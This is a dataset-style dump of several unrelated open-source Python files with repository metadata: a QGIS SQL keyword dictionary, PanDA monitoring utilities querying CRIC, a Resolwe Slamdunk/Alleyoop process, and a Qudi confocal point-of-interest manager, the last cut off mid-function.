code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
---|---|---|---|---|---|
# -*- coding: utf-8 -*-
"""
***************************************************************************
sql_dictionary.py
---------------------
Date : December 2015
Copyright : (C) 2015 by Hugo Mercier
Email : hugo dot mercier at oslandia dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from builtins import map
__author__ = 'Hugo Mercier'
__date__ = 'December 2015'
__copyright__ = '(C) 2015, Hugo Mercier'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
# keywords
keywords = [
# TODO get them from a reference page
"action", "add", "after", "all", "alter", "analyze", "and", "as", "asc",
"before", "begin", "between", "by", "cascade", "case", "cast", "check",
"collate", "column", "commit", "constraint", "create", "cross", "current_date",
"current_time", "current_timestamp", "default", "deferrable", "deferred",
"delete", "desc", "distinct", "drop", "each", "else", "end", "escape",
"except", "exists", "for", "foreign", "from", "full", "group", "having",
"ignore", "immediate", "in", "initially", "inner", "insert", "intersect",
"into", "is", "isnull", "join", "key", "left", "like", "limit", "match",
"natural", "no", "not", "notnull", "null", "of", "offset", "on", "or", "order",
"outer", "primary", "references", "release", "restrict", "right", "rollback",
"row", "savepoint", "select", "set", "table", "temporary", "then", "to",
"transaction", "trigger", "union", "unique", "update", "using", "values",
"view", "when", "where",
"abort", "attach", "autoincrement", "conflict", "database", "detach",
"exclusive", "explain", "fail", "glob", "if", "index", "indexed", "instead",
"plan", "pragma", "query", "raise", "regexp", "reindex", "rename", "replace",
"temp", "vacuum", "virtual"
]
spatialite_keywords = []
# functions
functions = [
# TODO get them from a reference page
"changes", "coalesce", "glob", "ifnull", "hex", "last_insert_rowid",
"nullif", "quote", "random",
"randomblob", "replace", "round", "soundex", "total_change",
"typeof", "zeroblob", "date", "datetime", "julianday", "strftime"
]
operators = [
' AND ', ' OR ', '||', ' < ', ' <= ', ' > ', ' >= ', ' = ', ' <> ', ' IS ', ' IS NOT ', ' IN ', ' LIKE ', ' GLOB ', ' MATCH ', ' REGEXP '
]
math_functions = [
# SQL math functions
"Abs", "ACos", "ASin", "ATan", "Cos", "Cot", "Degrees", "Exp", "Floor", "Log", "Log2",
"Log10", "Pi", "Radians", "Round", "Sign", "Sin", "Sqrt", "StdDev_Pop", "StdDev_Samp", "Tan",
"Var_Pop", "Var_Samp"]
string_functions = ["Length", "Lower", "Upper", "Like", "Trim", "LTrim", "RTrim", "Replace", "Substr"]
aggregate_functions = [
"Max", "Min", "Avg", "Count", "Sum", "Group_Concat", "Total", "Var_Pop", "Var_Samp", "StdDev_Pop", "StdDev_Samp"
]
spatialite_functions = [ # from www.gaia-gis.it/spatialite-2.3.0/spatialite-sql-2.3.0.html
# SQL utility functions for BLOB objects
"*iszipblob", "*ispdfblob", "*isgifblob", "*ispngblob", "*isjpegblob", "*isexifblob",
"*isexifgpsblob", "*geomfromexifgpsblob", "MakePoint", "BuildMbr", "*buildcirclembr", "ST_MinX",
"ST_MinY", "ST_MaxX", "ST_MaxY",
# SQL functions for constructing a geometric object given its Well-known Text Representation
"ST_GeomFromText", "*pointfromtext",
# SQL functions for constructing a geometric object given its Well-known Binary Representation
"*geomfromwkb", "*pointfromwkb",
# SQL functions for obtaining the Well-known Text / Well-known Binary Representation of a geometric object
"ST_AsText", "ST_AsBinary",
# SQL functions supporting exotic geometric formats
"*assvg", "*asfgf", "*geomfromfgf",
# SQL functions on type Geometry
"ST_Dimension", "ST_GeometryType", "ST_Srid", "ST_SetSrid", "ST_isEmpty", "ST_isSimple", "ST_isValid", "ST_Boundary",
"ST_Envelope",
# SQL functions on type Point
"ST_X", "ST_Y",
# SQL functions on type Curve [Linestring or Ring]
"ST_StartPoint", "ST_EndPoint", "ST_Length", "ST_isClosed", "ST_isRing", "ST_Simplify",
"*simplifypreservetopology",
# SQL functions on type LineString
"ST_NumPoints", "ST_PointN",
# SQL functions on type Surface [Polygon or Ring]
"ST_Centroid", "ST_PointOnSurface", "ST_Area",
# SQL functions on type Polygon
"ST_ExteriorRing", "ST_InteriorRingN",
# SQL functions on type GeomCollection
"ST_NumGeometries", "ST_GeometryN",
# SQL functions that test approximative spatial relationships via MBRs
"MbrEqual", "MbrDisjoint", "MbrTouches", "MbrWithin", "MbrOverlaps", "MbrIntersects",
"MbrContains",
# SQL functions that test spatial relationships
"ST_Equals", "ST_Disjoint", "ST_Touches", "ST_Within", "ST_Overlaps", "ST_Crosses", "ST_Intersects", "ST_Contains",
"ST_Relate",
# SQL functions for distance relationships
"ST_Distance",
# SQL functions that implement spatial operators
"ST_Intersection", "ST_Difference", "ST_Union", "ST_SymDifference", "ST_Buffer", "ST_ConvexHull",
# SQL functions for coordinate transformations
"ST_Transform",
# SQL functions for Spatial-MetaData and Spatial-Index handling
"*initspatialmetadata", "*addgeometrycolumn", "*recovergeometrycolumn", "*discardgeometrycolumn",
"*createspatialindex", "*creatembrcache", "*disablespatialindex",
# SQL functions implementing FDO/OGR compatibily
"*checkspatialmetadata", "*autofdostart", "*autofdostop", "*initfdospatialmetadata",
"*addfdogeometrycolumn", "*recoverfdogeometrycolumn", "*discardfdogeometrycolumn",
# SQL functions for MbrCache-based queries
"*filtermbrwithin", "*filtermbrcontains", "*filtermbrintersects", "*buildmbrfilter"
]
qgis_functions = [
"atan2", "round", "rand", "randf", "clamp", "scale_linear", "scale_exp", "_pi", "to_int", "toint", "to_real", "toreal",
"to_string", "tostring", "to_datetime", "todatetime", "to_date", "todate", "to_time", "totime", "to_interval", "tointerval",
"regexp_match", "now", "_now", "age", "year", "month", "week", "day", "hour", "minute", "second", "day_of_week", "title",
"levenshtein", "longest_common_substring", "hamming_distance", "wordwrap", "regexp_replace", "regexp_substr", "concat",
"strpos", "_left", "_right", "rpad", "lpad", "format", "format_number", "format_date", "color_rgb", "color_rgba", "ramp_color",
"color_hsl", "color_hsla", "color_hsv", "color_hsva", "color_cmyk", "color_cmyka", "color_part", "darker", "lighter",
"set_color_part", "point_n", "start_point", "end_point", "nodes_to_points", "segments_to_lines", "make_point",
"make_point_m", "make_line", "make_polygon", "x_min", "xmin", "x_max", "xmax", "y_min", "ymin", "y_max", "ymax", "geom_from_wkt",
"geomFromWKT", "geom_from_gml", "relate", "intersects_bbox", "bbox", "translate", "buffer", "point_on_surface", "reverse",
"exterior_ring", "interior_ring_n", "geometry_n", "bounds", "num_points", "num_interior_rings", "num_rings", "num_geometries",
"bounds_width", "bounds_height", "is_closed", "convex_hull", "sym_difference", "combine", "_union", "geom_to_wkt", "geomToWKT",
"transform", "uuid", "_uuid", "layer_property", "var", "_specialcol_", "project_color"]
# constants
constants = ["null", "false", "true"]
spatialite_constants = []
def getSqlDictionary(spatial=True):
def strip_star(s):
if s[0] == '*':
return s.lower()[1:]
else:
return s.lower()
k, c, f = list(keywords), list(constants), list(functions)
if spatial:
k += spatialite_keywords
f += spatialite_functions
f += qgis_functions
c += spatialite_constants
return {'keyword': list(map(strip_star, k)), 'constant': list(map(strip_star, c)), 'function': list(map(strip_star, f))}
def getQueryBuilderDictionary():
# concat functions
def ff(l):
return [s for s in l if s[0] != '*']
def add_paren(l):
return [s + "(" for s in l]
foo = sorted(add_paren(ff(list(set.union(set(functions), set(spatialite_functions), set(qgis_functions))))))
m = sorted(add_paren(ff(math_functions)))
agg = sorted(add_paren(ff(aggregate_functions)))
op = ff(operators)
s = sorted(add_paren(ff(string_functions)))
return {'function': foo, 'math': m, 'aggregate': agg, 'operator': op, 'string': s}
| wonder-sk/QGIS | python/plugins/db_manager/db_plugins/vlayers/sql_dictionary.py | Python | gpl-2.0 | 10,043 |
"""
Utils to get schedresources info from dedicated information system (CRIC)
"""
import urllib3
import json
import logging
from django.core.cache import cache
from core.schedresource.models import SchedconfigJson
from core.settings.config import CRIC_API_URL, DEPLOYMENT
_logger = logging.getLogger('bigpandamon')
def get_CRIC_panda_queues():
"""Get PanDA queues config from CRIC and put to cache"""
panda_queues_dict = cache.get(f'pandaQueues{DEPLOYMENT}')
if not panda_queues_dict:
panda_queues_dict = {}
url = CRIC_API_URL
http = urllib3.PoolManager()
try:
r = http.request('GET', url)
data = json.loads(r.data.decode('utf-8'))
for pq, params in data.items():
if DEPLOYMENT == 'ORACLE_ATLAS':
if 'vo_name' in params and params['vo_name'] == 'atlas':
panda_queues_dict[pq] = params
if DEPLOYMENT == 'ORACLE_DOMA':
if 'vo_name' in params and params['vo_name'] in ['osg', 'atlas']:
panda_queues_dict[pq] = params
except Exception as exc:
print (exc)
cache.set(f'pandaQueues{DEPLOYMENT}', panda_queues_dict, 60*20)
return panda_queues_dict
def get_panda_queues():
"""
Get PanDA queues info from available sources, priority: CRIC -> SchedconfigJson table -> Schedconfig
:return: dict of PQs
"""
# try get info from CRIC
try:
panda_queues_dict = get_CRIC_panda_queues()
except:
panda_queues_dict = None
_logger.error("[JSR] cannot get json from CRIC")
if not panda_queues_dict:
# get data from new SCHEDCONFIGJSON table
panda_queues_list = []
panda_queues_dict = {}
panda_queues_list.extend(SchedconfigJson.objects.values())
if len(panda_queues_list) > 0:
for pq in panda_queues_list:
try:
panda_queues_dict[pq['pandaqueue']] = json.loads(pq['data'])
except:
panda_queues_dict[pq['pandaqueue']] = None
_logger.error("cannot load json from SCHEDCONFIGJSON table for {} PanDA queue".format(pq['pandaqueue']))
return panda_queues_dict
def get_pq_atlas_sites():
"""
Get dict of PQ and corresponding ATLAS sites
:return: atlas_sites_dict: dict
"""
atlas_sites_dict = {}
pq_dict = get_panda_queues()
if pq_dict:
for pq, pqdata in pq_dict.items():
if 'atlas_site' in pqdata:
atlas_sites_dict[pq] = pqdata['atlas_site']
return atlas_sites_dict
def get_pq_resource_types():
"""
Extract resource types for PQs from CRIC PQ JSON
:return:
"""
resource_types_dict = {}
pq_dict = get_panda_queues()
if pq_dict:
for pq, pqdata in pq_dict.items():
if 'siteid' in pqdata and 'resource_type' in pqdata:
resource_types_dict[pqdata['siteid']] = pqdata['resource_type']
return resource_types_dict
def get_pq_fairshare_policy():
"""
Extract fairshare policy for PQs from CRIC PQ JSON
:return:
"""
fairshare_policy_dict = {}
pq_dict = get_panda_queues()
if pq_dict:
for pq, pqdata in pq_dict.items():
if 'siteid' in pqdata and 'fairsharepolicy' in pqdata:
fairshare_policy_dict[pqdata['siteid']] = pqdata['fairsharepolicy']
return fairshare_policy_dict
def get_panda_resource(pq_name):
"""Rerurns dict for a particular PanDA queue"""
pq_dict = get_panda_queues()
if pq_dict and pq_name in pq_dict:
return pq_dict[pq_name]
return None
url = "https://atlas-cric.cern.ch/api/atlas/pandaqueue/query/?json"
http = urllib3.PoolManager()
data = {}
try:
r = http.request('GET', url)
data = json.loads(r.data.decode('utf-8'))
for cs in data.keys():
if (data[cs] and siterec.siteid == data[cs]['siteid']):
return data[cs]['panda_resource']
except Exception as exc:
print(exc)
def get_basic_info_for_pqs(pq_list):
"""
Return list of dicts with basic info for list of PQs, including ATLAS site, region (cloud), tier, corepower, status
If input pq_list empty, return all
:param pq_list: list
:return: site_list: list
"""
pq_info_list = []
pq_info = get_panda_queues()
if len(pq_list) > 0:
for pq in pq_list:
if pq in pq_info and pq_info[pq]:
pq_info_list.append({
'pq_name': pq,
'site': pq_info[pq]['gocname'],
'region': pq_info[pq]['cloud'],
'tier': pq_info[pq]['tier'],
'corepower': pq_info[pq]['corepower'],
'status': pq_info[pq]['status'],
})
else:
for pq, pqdata in pq_info.items():
pq_info_list.append({
'pq_name': pq,
'site': pq_info[pq]['gocname'],
'region': pq_info[pq]['cloud'],
'tier': pq_info[pq]['tier'],
'corepower': pq_info[pq]['corepower'],
'status': pq_info[pq]['status'],
})
return pq_info_list
def get_object_stores():
object_stores_dict = cache.get('objectStores')
if not object_stores_dict:
object_stores_dict = {}
url = "https://atlas-cric.cern.ch/api/atlas/ddmendpoint/query/?json&type=OS_"
http = urllib3.PoolManager()
try:
r = http.request('GET', url)
data = json.loads(r.data.decode('utf-8'))
except Exception as exc:
_logger.exception(exc)
data = {}
for OSname, OSdescr in data.items():
if "resource" in OSdescr and "bucket_id" in OSdescr["resource"]:
object_stores_dict[OSdescr["resource"]["bucket_id"]] = {
'name': OSname,
'site': OSdescr["site"],
'region': OSdescr['cloud'],
}
object_stores_dict[OSdescr["resource"]["id"]] = {
'name': OSname,
'site': OSdescr["site"],
'region': OSdescr['cloud'],
}
object_stores_dict[OSdescr["id"]] = {
'name': OSname,
'site': OSdescr["site"],
'region': OSdescr['cloud'],
}
cache.set('objectStores', object_stores_dict, 3600)
return object_stores_dict
def getCRICSEs():
SEs = cache.get('CRIC_SEs')
if not SEs:
url = "https://atlas-cric.cern.ch/api/atlas/ddmendpoint/query/?json"
http = urllib3.PoolManager()
SEs = {}
try:
r = http.request('GET', url)
data = json.loads(r.data.decode('utf-8'))
for se in data.keys():
su = data[se].get("su", None)
if su:
SEs.setdefault(su, set()).add(se)
except Exception:
_logger.exception('Got exception on getCRICSEs')
cache.set('CRIC_SEs', SEs, 7200)
return SEs
def getCRICSites():
sitesUcore = cache.get('sitesUcore')
sitesHarvester = cache.get('sitesHarvester')
sitesType = cache.get('sitesType')
computevsAtlasCE = cache.get('computevsAtlasCE')
if not (sitesUcore and sitesHarvester and computevsAtlasCE and sitesType):
sitesUcore, sitesHarvester = [], []
computevsAtlasCE, sitesType = {}, {}
url = "https://atlas-cric.cern.ch/api/atlas/pandaqueue/query/?json"
http = urllib3.PoolManager()
data = {}
try:
r = http.request('GET', url)
data = json.loads(r.data.decode('utf-8'))
for cs in data.keys():
if 'unifiedPandaQueue' in data[cs]['catchall'] or 'ucore' in data[cs]['capability']:
sitesUcore.append(data[cs]['siteid'])
if 'harvester' in data[cs] and len(data[cs]['harvester']) != 0:
sitesHarvester.append(data[cs]['siteid'])
if 'panda_site' in data[cs]:
computevsAtlasCE[cs] = data[cs]['atlas_site']
if 'type' in data[cs]:
sitesType[cs] = data[cs]['type']
except Exception as exc:
print(exc)
cache.set('sitesUcore', sitesUcore, 3600)
cache.set('sitesHarvester', sitesHarvester, 3600)
cache.set('sitesType', sitesType, 3600)
cache.set('computevsAtlasCE', computevsAtlasCE, 3600)
return sitesUcore, sitesHarvester, sitesType, computevsAtlasCE
| PanDAWMS/panda-bigmon-core | core/schedresource/utils.py | Python | apache-2.0 | 8,706 |
# -*- coding: utf-8 -*-
"""
Passes through commands to the created device.
"""
from __future__ import unicode_literals, print_function
class DeviceFactory:
def __init__(self, factory):
self.factory = factory
def address(self):
return self.factory.address()
def reading(self):
return self.factory.reading()
def state(self):
return self.factory.state()
def type(self):
return self.factory.type()
| chrisramsay/pysense | pysense/device/device_factory.py | Python | gpl-2.0 | 462 |
"""Run Alleyoop collapse tool on Slamdunk results."""
import os
import pandas as pd
from plumbum import TEE
from resolwe.process import Cmd, DataField, FileField, StringField
from resolwe_bio.process.runtime import ProcessBio
def compute_tpm(tcount):
"""Normalize readCount column to TPM values."""
exp = pd.read_csv(
tcount,
sep="\t",
index_col="gene_name",
)
exp["rpk"] = exp.apply(lambda x: (x.readCount * 1e3 / x.length), axis=1)
rpk_sum = exp["rpk"].sum()
exp["readsTPM"] = exp.apply(lambda x: (x.rpk / rpk_sum * 1e6), axis=1)
return exp
class AlleyoopCollapse(ProcessBio):
"""Run Alleyoop collapse tool on Slamdunk results."""
slug = "alleyoop-collapse"
process_type = "data:alleyoop:collapse"
name = "Alleyoop collapse"
requirements = {
"expression-engine": "jinja",
"executor": {
"docker": {"image": "public.ecr.aws/s4q6j6e8/resolwebio/slamdunk:2.0.0"},
},
"resources": {
"cores": 1,
"memory": 8192,
"network": True,
},
}
entity = {
"type": "sample",
}
category = "Slamdunk"
data_name = '{{ slamdunk|sample_name|default("?") }}'
version = "1.3.0"
class Input:
"""Input fields for SlamdunkAllPaired."""
slamdunk = DataField("alignment:bam:slamdunk", label="Slamdunk results")
source = StringField(
label="Gene ID source",
default="ENSEMBL",
choices=[
("ENSEMBL", "ENSEMBL"),
("UCSC", "UCSC"),
],
)
class Output:
"""Output fields to process SlamdunkAllPaired."""
tcount = FileField(label="Count report containing SLAMSeq statistics")
species = StringField(label="Species")
build = StringField(label="Build")
def run(self, inputs, outputs):
"""Run analysis."""
basename = os.path.basename(inputs.slamdunk.output.tcount.path)
assert basename.endswith(".tsv")
name = basename[:-4]
args = [
"-o",
".",
"-t",
self.requirements.resources.cores,
]
return_code, _, _ = Cmd["alleyoop"]["collapse"][args][
inputs.slamdunk.output.tcount.path
] & TEE(retcode=None)
if return_code:
self.error("Alleyoop collapse analysis failed.")
collapsed_output = name + "_collapsed.txt"
os.rename(name + "_collapsed.csv", collapsed_output)
# normalize to TPM
tcount_tpm = compute_tpm(collapsed_output)
# Map gene symbols to feature IDs
feature_dict = {}
out_columns = [
"gene_symbol",
"length",
"readsCPM",
"readsTPM",
"conversionRate",
"Tcontent",
"coverageOnTs",
"conversionsOnTs",
"readCount",
"tcReadCount",
"multimapCount",
]
input_features = tcount_tpm.index.tolist()
features = {
"source": inputs.source,
"species": inputs.slamdunk.output.species,
"feature_id__in": input_features,
}
feature_dict = {f.feature_id: f.name for f in self.feature.filter(**features)}
tcount_tpm["gene_symbol"] = tcount_tpm.index.map(feature_dict)
tcount_tpm.to_csv(collapsed_output, columns=out_columns, sep="\t")
outputs.tcount = collapsed_output
outputs.species = inputs.slamdunk.output.species
outputs.build = inputs.slamdunk.output.build
| genialis/resolwe-bio | resolwe_bio/processes/slamdunk/alleyoop_collapse.py | Python | apache-2.0 | 3,626 |
# -*- coding: utf-8 -*-
"""
@author: Stijn Van Hoey
pySTAN: python STRucture ANalyst
"""
import numpy as np
import matplotlib.pyplot as plt
from evaluationfunctions import Evaluation, Likelihood
from sensitivity_base import SensitivityAnalysis
from sensitivity_dynamic import DynamicSensitivity
from sensitivity_globaloat import GlobalOATSensitivity
from sensitivity_morris import MorrisScreening
from sensitivity_regression import SRCSensitivity
from sensitivity_sobol import SobolVariance
from sensitivity_rsa import RegionalSensitivity
__version__ = "0.0.2"
if __name__ == '__main__':
print 'pySTAN: python STRucture ANalyst (Van Hoey S. 2012)' | stijnvanhoey/pystran | pystran/__init__.py | Python | bsd-3-clause | 682 |
# -*- coding: utf-8 -*-
"""
This module contains a POI Manager core class which gives capability to mark
points of interest, re-optimise their position, and keep track of sample drift
over time.
Qudi is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Qudi is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Qudi. If not, see <http://www.gnu.org/licenses/>.
Copyright (c) the Qudi Developers. See the COPYRIGHT.txt file at the
top-level directory of this distribution and at <https://github.com/Ulm-IQO/qudi/>
"""
import logging
import math
import numpy as np
import re
import scipy.ndimage as ndimage
import scipy.ndimage.filters as filters
import time
from collections import OrderedDict
from core.module import Connector
from core.util.mutex import Mutex
from datetime import datetime
from logic.generic_logic import GenericLogic
from qtpy import QtCore
class PoI:
"""
The actual individual poi is saved in this generic object.
"""
def __init__(self, pos=None, name=None, key=None):
# Logging
self.log = logging.getLogger(__name__)
# The POI has fixed coordinates relative to the sample, enabling a map to be saved.
self._coords_in_sample = []
# The POI is at a scanner position, which may vary with time (drift). This time
# trace records every time+position when the POI position was explicitly known.
self._position_time_trace = []
# To avoid duplication while algorithmically setting POIs, we need the key string to
# go to sub-second. This requires the datetime module.
self._creation_time = datetime.now()
if key is None:
self._key = self._creation_time.strftime('poi_%Y%m%d_%H%M_%S_%f')
else:
self._key = key
if pos is not None:
if len(pos) != 3:
self.log.error('Given position does not contain 3 '
'dimensions.'
)
# Store the time in the history log as seconds since 1970,
# rather than as a datetime object.
creation_time_sec = (self._creation_time - datetime.utcfromtimestamp(0)).total_seconds()
self._position_time_trace.append(
np.array([creation_time_sec, pos[0], pos[1], pos[2]]))
if name is None:
self._name = self._creation_time.strftime('poi_%H%M%S')
else:
self._name = name
def set_coords_in_sample(self, coords=None):
'''Defines the position of the poi relative to the sample,
allowing a sample map to be constructed. Once set, these
"coordinates in sample" will not be altered unless the user wants to
manually redefine this POI (for example, they put the POI in
the wrong place).
'''
if coords is not None: # FIXME: Futurewarning fired here.
if len(coords) != 3:
self.log.error('Given position does not contain 3 '
'dimensions.'
)
self._coords_in_sample = [coords[0], coords[1], coords[2]]
def add_position_to_history(self, position=None):
""" Adds an explicitly known position+time to the history of the POI.
@param float[3] position: position coordinates of the poi
@return int: error code (0:OK, -1:error)
"""
if position is None:
position = []
if isinstance(position, (np.ndarray,)) and not position.size == 3:
return -1
elif isinstance(position, (list, tuple)) and not len(position) == 3:
return -1
else:
self._position_time_trace.append(
np.array([time.time(), position[0], position[1], position[2]]))
def get_coords_in_sample(self):
""" Returns the coordinates of the POI relative to the sample.
@return float[3]: the POI coordinates.
"""
return self._coords_in_sample
def set_name(self, name=None):
""" Sets the name of the poi.
@param string name: name to be set.
@return int: error code (0:OK, -1:error)
"""
if self._name is 'crosshair' or self._name is 'sample':
# self.log.error('You can not change the name of the crosshair.')
return -1
if name is not None:
self._name = name
return 0
if len(self._position_time_trace) > 0:
self._name = time.strftime('Point_%Y%m%d_%M%S%', self._creation_time)
return -1
else:
self._name = time.strftime('Point_%Y%m%d_%M%S%')
return -1
def get_name(self):
""" Returns the name of the poi.
@return string: name
"""
return self._name
def get_key(self):
""" Returns the dictionary key of the poi.
@return string: key
"""
return self._key
def get_position_history(self): # TODO: instead of "trace": drift_log, history,
""" Returns the whole position history as array.
@return float[][4]: the whole position history
"""
return np.array(self._position_time_trace)
def delete_last_position(self): # TODO:Rename to delete_last_position
""" Delete the last position in the history.
@return float[4]: the position just deleted.
"""
if len(self._position_time_trace) > 0:
return self._position_time_trace.pop()
else:
return [-1., -1., -1., -1.]
class PoiManagerLogic(GenericLogic):
"""
This is the Logic class for mapping and tracking bright features in the confocal scan.
"""
_modclass = 'poimanagerlogic'
_modtype = 'logic'
# declare connectors
optimizer1 = Connector(interface='OptimizerLogic')
scannerlogic = Connector(interface='ConfocalLogic')
savelogic = Connector(interface='SaveLogic')
signal_timer_updated = QtCore.Signal()
signal_poi_updated = QtCore.Signal()
signal_poi_deleted = QtCore.Signal(str)
signal_confocal_image_updated = QtCore.Signal()
signal_periodic_opt_started = QtCore.Signal()
signal_periodic_opt_duration_changed = QtCore.Signal()
signal_periodic_opt_stopped = QtCore.Signal()
def __init__(self, config, **kwargs):
super().__init__(config=config, **kwargs)
self.roi_name = ''
self.poi_list = dict()
self._current_poi_key = None
self.go_to_crosshair_after_refocus = False # default value
# timer and its handling for the periodic refocus
self.timer = None
self.time_left = 0
self.timer_step = 0
self.timer_duration = 300
# locking for thread safety
self.threadlock = Mutex()
def on_activate(self):
""" Initialisation performed during activation of the module.
"""
self._optimizer_logic = self.get_connector('optimizer1')
self._confocal_logic = self.get_connector('scannerlogic')
self._save_logic = self.get_connector('savelogic')
# initally add crosshair to the pois
crosshair = PoI(pos=[0, 0, 0], name='crosshair')
crosshair._key = 'crosshair'
self.poi_list[crosshair._key] = crosshair
# initally add sample to the pois
sample = PoI(pos=[0, 0, 0], name='sample')
sample._key = 'sample'
self.poi_list[sample._key] = sample
# listen for the refocus to finish
self._optimizer_logic.sigRefocusFinished.connect(self._refocus_done)
# listen for the deactivation of a POI caused by moving to a different position
self._confocal_logic.signal_change_position.connect(self.user_move_deactivates_poi)
self.testing()
# Initialise the roi_map_data (xy confocal image)
self.roi_map_data = self._confocal_logic.xy_image
# A POI is active if the scanner is at that POI
self.active_poi = None
def on_deactivate(self):
return
def user_move_deactivates_poi(self, tag):
""" Deactivate the active POI if the confocal microscope scanner position is
moved by anything other than the optimizer
"""
if tag != 'optimizer':
self._deactivate_poi()
def testing(self):
""" Debug function for testing. """
pass
def add_poi(self, position=None, key=None, emit_change=True):
""" Creates a new poi and adds it to the list.
@return int: key of this new poi
A position can be provided (such as during re-loading a saved ROI).
If no position is provided, then the current crosshair position is used.
"""
# If there are only 2 POIs (sample and crosshair) then the newly added POI needs to start the sample drift logging.
if len(self.poi_list) == 2:
self.poi_list['sample']._creation_time = time.time()
self.poi_list['sample'].delete_last_position()
self.poi_list['sample'].add_position_to_history(position=[0, 0, 0])
self.poi_list['sample'].set_coords_in_sample(coords=[0, 0, 0])
if position is None:
position = self._confocal_logic.get_position()
if len(position) != 3:
self.log.error('Given position is not 3-dimensional.'
'Please pass POIManager a 3-dimensional position to set a POI.')
return
new_poi = PoI(pos=position, key=key)
self.poi_list[new_poi.get_key()] = new_poi
# The POI coordinates are set relative to the last known sample position
most_recent_sample_pos = self.poi_list['sample'].get_position_history()[-1, :][1:4]
this_poi_coords = position - most_recent_sample_pos
new_poi.set_coords_in_sample(coords=this_poi_coords)
# Since POI was created at current scanner position, it automatically
# becomes the active POI.
self.set_active_poi(poikey=new_poi.get_key())
if emit_change:
self.signal_poi_updated.emit()
return new_poi.get_key()
def get_confocal_image_data(self):
""" Get the current confocal xy scan data to hold as image of ROI"""
# get the roi_map_data (xy confocal image)
self.roi_map_data = self._confocal_logic.xy_image
self.signal_confocal_image_updated.emit()
def get_all_pois(self, abc_sort=False):
""" Returns a list of the names of all existing POIs.
@return string[]: List of names of the POIs
Also crosshair and sample are included.
"""
if abc_sort is False:
return sorted(self.poi_list.keys())
elif abc_sort is True:
# First create a dictionary with poikeys indexed against names
poinames = [''] * len(self.poi_list.keys())
for i, poikey in enumerate(self.poi_list.keys()):
poiname = self.poi_list[poikey].get_name()
poinames[i] = [poiname, poikey]
# Sort names in the way that humans expect (site1, site2, site11, etc)
# Regular expressions to make sorting key
convert = lambda text: int(text) if text.isdigit() else text
alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key[0])]
# Now we can sort poinames by name and return keys in that order
return [key for [name, key] in sorted(poinames, key=alphanum_key)]
else:
# TODO: produce sensible error about unknown value of abc_sort.
self.log.debug('fix TODO!')
# TODO: Find a way to return a list of POI keys sorted in order of the POI names.
def delete_poi(self, poikey=None):
""" Completely deletes the whole given poi.
@param string poikey: the key of the poi
@return int: error code (0:OK, -1:error)
Does not delete the crosshair and sample.
"""
if poikey is not None and poikey in self.poi_list.keys():
if poikey is 'crosshair' or poikey is 'sample':
self.log.warning('You cannot delete the crosshair or sample.')
return -1
del self.poi_list[poikey]
# If the active poi was deleted, there is no way to automatically choose
# another active POI, so we deactivate POI
if self.active_poi is not None and poikey == self.active_poi.get_key():
self._deactivate_poi()
self.signal_poi_updated.emit()
self.signal_poi_deleted.emit(poikey)
return 0
else:
self.log.error('X. The given POI ({0}) does not exist.'.format(
poikey))
return -1
def optimise_poi(self, poikey=None):
""" Starts the optimisation procedure for the given poi.
@param string poikey: the key of the poi
@return int: error code (0:OK, -1:error)
This is threaded, so it returns directly.
The function _refocus_done handles the data when the optimisation returns.
"""
if poikey is not None and poikey in self.poi_list.keys():
self.poi_list['crosshair'].add_position_to_history(position=self._confocal_logic.get_position())
self._current_poi_key = poikey
self._optimizer_logic.start_refocus(
initial_pos=self.get_poi_position(poikey=poikey),
caller_tag='poimanager')
return 0
else:
self.log.error(
'Z. The given POI ({0}) does not exist.'.format(poikey))
return -1
def go_to_poi(self, poikey=None):
""" Goes to the given poi and saves it as the current one.
@param string poikey: the key of the poi
@return int: error code (0:OK, -1:error)
"""
if poikey is not None and poikey in self.poi_list.keys():
self._current_poi_key = poikey
x, y, z = self.get_poi_position(poikey=poikey)
self._confocal_logic.set_position('poimanager', x=x, y=y, z=z)
else:
self.log.error('F. The given POI ({0}) does not exist.'.format(
poikey))
return -1
# This is now the active POI to send to save logic for naming in any saved filenames.
self.set_active_poi(poikey)
def get_poi_position(self, poikey=None):
""" Returns the current position of the given poi, calculated from the
POI coords in sample and the current sample position.
@param string poikey: the key of the poi
@return
"""
if poikey is not None and poikey in self.poi_list.keys():
poi_coords = self.poi_list[poikey].get_coords_in_sample()
sample_pos = self.poi_list['sample'].get_position_history()[-1, :][1:4]
return sample_pos + poi_coords
else:
self.log.error('G. The given POI ({0}) does not exist.'.format(
poikey))
return [-1., -1., -1.]
def set_new_position(self, poikey=None, newpos=None):
"""
Moves the given POI to a new position, and uses this information to update
the sample position.
@param string poikey: the key of the poi
@param float[3] newpos: coordinates of the new position
@return int: error code (0:OK, -1:error)
"""
# If no new position is given, take the current confocal crosshair position
if newpos is None:
newpos = self._confocal_logic.get_position()
if poikey is not None and poikey in self.poi_list.keys():
if len(newpos) != 3:
self.log.error('Length of set poi is not 3.')
return -1
# Add new position to trace of POI
self.poi_list[poikey].add_position_to_history(position=newpos)
# Calculate sample shift and add it to the trace of 'sample' POI
sample_shift = newpos - self.get_poi_position(poikey=poikey)
sample_shift += self.poi_list['sample'].get_position_history()[-1, :][1:4]
self.poi_list['sample'].add_position_to_history(position=sample_shift)
# signal POI has been updated (this will cause GUI to redraw)
if (poikey is not 'crosshair') and (poikey is not 'sample'):
self.signal_poi_updated.emit()
return 0
self.log.error('J. The given POI ({0}) does not exist.'.format(poikey))
return -1
def move_coords(self, poikey=None, newpos=None):
"""Updates the coords of a given POI, and adds a position to the POI history,
but DOES NOT update the sample position.
"""
if newpos is None:
newpos = self._confocal_logic.get_position()
if poikey is not None and poikey in self.poi_list.keys():
if len(newpos) != 3:
self.log.error('Length of set poi is not 3.')
return -1
this_poi = self.poi_list[poikey]
return_val = this_poi.add_position_to_history(position=newpos)
sample_pos = self.poi_list['sample'].get_position_history()[-1, :][1:4]
